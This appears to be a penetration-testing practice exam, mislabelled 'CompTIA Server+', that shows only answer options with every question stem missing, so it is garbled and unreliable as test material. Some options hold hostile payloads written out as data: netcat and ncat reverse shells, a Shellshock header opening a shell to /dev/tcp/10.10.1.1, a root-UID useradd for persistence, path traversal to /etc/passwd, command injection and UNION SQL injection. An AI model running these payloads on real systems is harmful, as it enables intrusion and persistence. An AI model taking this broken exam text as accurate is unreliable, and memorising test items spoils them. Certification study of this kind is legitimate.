Exam 13: CompTIA Server+

A) A device on the network has an IP address in the wrong subnet.
B) A multicast session was initiated using the wrong multicast group.
C) An ARP flooding attack is using the broadcast address to perform DDoS.
D) A device on the network has poisoned the ARP cache.

A) Enforce enhanced password complexity requirements.
B) Disable or upgrade SSH daemon.
C) Disable HTTP/301 redirect configuration.
D) Create an out-of-band network for management.
E) Implement a better method for authentication.
F) Eliminate network management and control interfaces.

A) Ensure the client has signed the SOW.
B) Verify the client has granted network access to the hot site.
C) Determine if the failover environment relies on resources not owned by the client.
D) Establish communication and escalation procedures with the client.

A) Look for open ports.
B) Listen for a reverse shell.
C) Attempt to flood open ports.
D) Create an encrypted tunnel.

A) Burp Suite
B) DirBuster
C) WPScan
D) OWASP ZAP

A) The most critical risks of web applications
B) A list of all the risks of web applications
C) The risks defined in order of importance
D) A web-application security standard
E) A risk-governance and compliance framework
F) A checklist of Apache vulnerabilities

A) Buffer overflows
B) Cross-site scripting
C) Race-condition attacks
D) Zero-day attacks
E) Injection flaws
F) Ransomware attacks

A) Wireshark
B) Nessus
C) Retina
D) Burp Suite
E) Shodan
F) Nikto

A) Web-application firewall
B) Parameterized queries
C) Output encoding
D) Session tokens
E) Input validation
F) Base64 encoding

A) compilation
B) connection
C) concatenation
D) conjunction

A) RFID cloning
B) RFID tagging
C) Meta tagging
D) Tag nesting

A) Redirecting Bash history to /dev/null Redirecting Bash history to /dev/null
B) Making a copy of the user's Bash history for further enumeration
C) Covering tracks by clearing the Bash history
D) Making decoy files on the system to confuse incident responders

A) A signed statement of work
B) The correct user accounts and associated passwords
C) The expected time frame of the assessment
D) The proper emergency contacts for the client

A) NDA
B) MSA
C) SOW
D) MOU

A) val++
B) +val
C) val=(val+1)
D) ++val
E) val=val++
F) val+=1

A) nmap -f -sV -p80 192.168.1.20
B) nmap -sS -sL -p80 192.168.1.20
C) nmap -A -T4 -p80 192.168.1.20
D) nmap -O -v -p80 192.168.1.20

A) Implement a recurring cybersecurity awareness education program for all users.
B) Implement multifactor authentication on all corporate applications.
C) Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
D) Implement an email security gateway to block spam and malware from email communications.

A) Website scraping
B) Website cloning
C) Domain enumeration
D) URL enumeration

A) grep -v apache ~/.bash_history > ~/.bash_history
B) rm -rf /tmp/apache
C) chmod 600 /tmp/apache
D) taskkill /IM "apache" /F

A) The penetration tester was testing the wrong assets
B) The planning process failed to ensure all teams were notified
C) The client was not ready for the assessment to start
D) The penetration tester had incorrect contact information

A) Halt the penetration test.
B) Conduct an incident response.
C) Deconflict with the penetration tester.
D) Assume the alert is from the penetration test.

A) Whether the cloud service provider allows the penetration tester to test the environment
B) Whether the specific cloud services are being used by the application
C) The geographical location where the cloud services are running
D) Whether the country where the cloud service is based has any impeding laws

A) Clarify the statement of work.
B) Obtain an asset inventory from the client.
C) Interview all stakeholders.
D) Identify all third parties involved.

A) index.html
B) about
C) info
D) home.html

A) Comma
B) Double dash
C) Single quote
D) Semicolon

A) Determine active hosts on the network.
B) Set the TTL of ping packets for stealth.
C) Fill the ARP table of the networked devices.
D) Scan the system on the most used ports.

A) IP addresses and subdomains
B) Zone transfers
C) DNS forward and reverse lookups
D) Internet search engines
E) Externally facing open ports
F) Shodan results

A) Run nmap with the -o , -p22 , and -sC options set against the target Run nmap with the -o , -p22 , and -sC options set against the target
B) Run nmap with the -sV and -p22 options set against the target -sV and -p22
C) Run nmap with the --script vulners option set against the target --script vulners option set against the target
D) Run nmap with the -sA option set against the target -sA

A) Cross-site request forgery
B) Server-side request forgery
C) Remote file inclusion
D) Local file inclusion

A) Perform XSS.
B) Conduct a watering-hole attack.
C) Use BeEF.
D) Use browser autopwn.

A) Add a dependency checker into the tool chain.
B) Perform routine static and dynamic analysis of committed code.
C) Validate API security settings before deployment.
D) Perform fuzz testing of compiled binaries.

A) Perform forensic analysis to isolate the means of compromise and determine attribution.
B) Incorporate the newly identified method of compromise into the red team's approach.
C) Create a detailed document of findings before continuing with the assessment.
D) Halt the assessment and follow the reporting procedures as outlined in the contract.

A) nmap -p0 -T0 -sS 192.168.1.10
B) nmap -sA -sV --host-timeout 60 192.168.1.10
C) nmap -f --badsum 192.168.1.10
D) nmap -A -n 192.168.1.10

A) Set the SGID on all files in the / directory
B) Find the /root directory on the system Find the /root directory on the system
C) Find files with the SUID bit set
D) Find files that were created during exploitation and move them to /dev/null Find files that were created during exploitation and move them to /dev/null

A) Create a one-shot systemd service to establish a reverse shell.
B) Obtain /etc/shadow and brute force the root password. Obtain /etc/shadow and brute force the root password.
C) Run the nc -e /bin/sh <...> command. Run the nc -e /bin/sh <...> command.
D) Move laterally to create a user account on LDAP

A) iam_enum_permissions
B) iam_privesc_scan
C) iam_backdoor_assume_role
D) iam_bruteforce_permissions

A) Immunity Debugger
B) OllyDbg
C) GDB
D) Drozer

A) Manually check the version number of the VoIP service against the CVE release
B) Test with proof-of-concept code from an exploit database
C) Review SIP traffic from an on-path position to look for indicators of compromise
D) Utilize an nmap -sV scan against the service Utilize an nmap -sV scan against the service

A) Weekly
B) Monthly
C) Quarterly
D) Annually

A) schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
B) wmic startup get caption,command
C) crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
D) sudo useradd -ou 0 -g 0 user

A) Third party
B) Team leader
C) Chief Information Officer
D) Client

A) Create a custom password dictionary as preparation for password spray testing.
B) Recommend using a password manage/vault instead of text files to store passwords securely.
C) Recommend configuring password complexity rules in all the systems and applications.
D) Document the unprotected file repository as a finding in the penetration-testing report.

A) Root user
B) Local administrator
C) Service
D) Network administrator

A) MD5
B) bcrypt
C) SHA-1
D) PBKDF2

A) OpenVAS
B) Drozer
C) Burp Suite
D) OWASP ZAP

A) Forensically acquire the backdoor Trojan and perform attribution
B) Utilize the backdoor in support of the engagement
C) Continue the engagement and include the backdoor finding in the final report
D) Inform the customer immediately about the backdoor

A) Edit the discovered file with one line of code for remote callback
B) Download .pl files and look for usernames and passwords
C) Edit the smb.conf file and upload it to the server
D) Download the smb.conf file and look at configurations

A) "cisco-ios" "admin+1234"
B) "cisco-ios" "no-password"
C) "cisco-ios" "default-passwords"
D) "cisco-ios" "last-modified"

A) exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B) exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
C) exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
D) exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

A) HTTPS communication
B) Public and private keys
C) Password encryption
D) Sessions and cookies

A) Deploy a user training program
B) Implement a patch management plan
C) Utilize the secure software development life cycle
D) Configure access controls on each of the servers

A) will reveal vulnerabilities in the Modbus protocol.
B) may cause unintended failures in control systems.
C) may reduce the true positive rate of findings.
D) will create a denial-of-service condition on the IP networks.

A) John the Ripper
B) Hydra
C) Mimikatz
D) Cain and Abel

A)
B)
C)
D) [########################################################] 100%

A)
B) ../../../../../../../../../../etc/passwd
C) /var/www/html/index.php;whoami
D) 1 UNION SELECT 1, DATABASE(),3--

A) The reverse-engineering team may have a history of selling exploits to third parties.
B) The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
C) The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
D) The reverse-engineering team will be given access to source code for analysis.

A) Phishing
B) Tailgating
C) Baiting
D) Shoulder surfing

A) A firewall or IPS blocked the scan.
B) The penetration tester used unsupported flags.
C) The edge network device was disconnected.
D) The scan returned ICMP echo replies.

A) This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22 handle heartbeat extension packets, allowing attackers to obtain sensitive information from process memory.
B) This device is most likely a gateway with in-band management services.
C) This device is most likely a proxy server forwarding requests over TCP/443.
D) This device may be vulnerable to remote code execution because of a butter overflow vulnerability in the method used to extract DNS names from packets prior to DNSSEC validation.

A) Scraping social media sites
B) Using the WHOIS lookup tool
C) Crawling the client's website
D) Phishing company employees
E) Utilizing DNS lookup tools
F) Conducting wardriving near the client facility

A) Follow the established data retention and destruction process
B) Report any findings to regulatory oversight groups
C) Publish the findings after the client reviews the report
D) Encrypt and store any client information for future analysis

A) Clickjacking
B) Session hijacking
C) Parameter pollution
D) Cookie hijacking
E) Cross-site scripting

A) Network device
B) Public-facing web server
C) Active Directory domain controller
D) IoT/embedded device
E) Exposed RDP
F) Print queue

A) Data flooding
B) Session riding
C) Cybersquatting
D) Side channel

A) To provide feedback on the report structure and recommend improvements
B) To discuss the findings and dispute any false positives
C) To determine any processes that failed to meet expectations during the assessment
D) To ensure the penetration-testing team destroys all company data that was gathered during the test